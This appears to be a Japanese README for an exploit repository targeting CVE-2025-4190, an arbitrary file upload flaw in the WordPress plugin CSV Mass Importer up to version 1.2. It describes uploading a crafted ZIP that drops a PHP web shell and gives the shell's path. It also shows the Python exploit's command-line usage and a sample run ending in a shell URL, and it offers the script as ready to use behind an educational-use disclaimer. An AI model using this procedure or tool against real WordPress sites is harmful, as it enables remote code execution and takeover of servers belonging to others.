
CSV Mass Importer <= 1.2 - Admin+ 任意のファイルアップロード
WordPress用プラグイン CSV Mass Importer(≤ 1.2)には、Admin+ 任意ファイルアップロードの脆弱性が存在します。
アップロードファイルの検証が不適切なため、高い権限を持つユーザー(管理者など)は、たとえばマルチサイト環境などで制限されるべき場合でも、サーバー上に任意のファイルをアップロードできます。
この脆弱性により、攻撃者はPHPシェルや悪意のあるファイルをアップロードでき、サーバー上で**リモートコード実行(RCE)**につながります。
発見者: Nxploited (Khaled Alenazi)。
このプラグインは、CSVインポート機能を使用する際にアップロードされたファイルを適切にチェックしません。
PHPシェルを含む細工されたZIPファイルをアップロードし、公開アクセス可能なディレクトリに展開できます。
シェルのパス例:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
このリポジトリには、すぐに使えるPythonエクスプロイトスクリプト 4190.py が含まれています。
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
このコードは教育目的のみで提供されています。
作者は、このスクリプトによって引き起こされた誤用や損害について一切責任を負いません。
責任を持って、テストを許可されたシステムでのみ使用してください。
Khaled Alenazi (Nxploited) によって発見・開発されました 🌟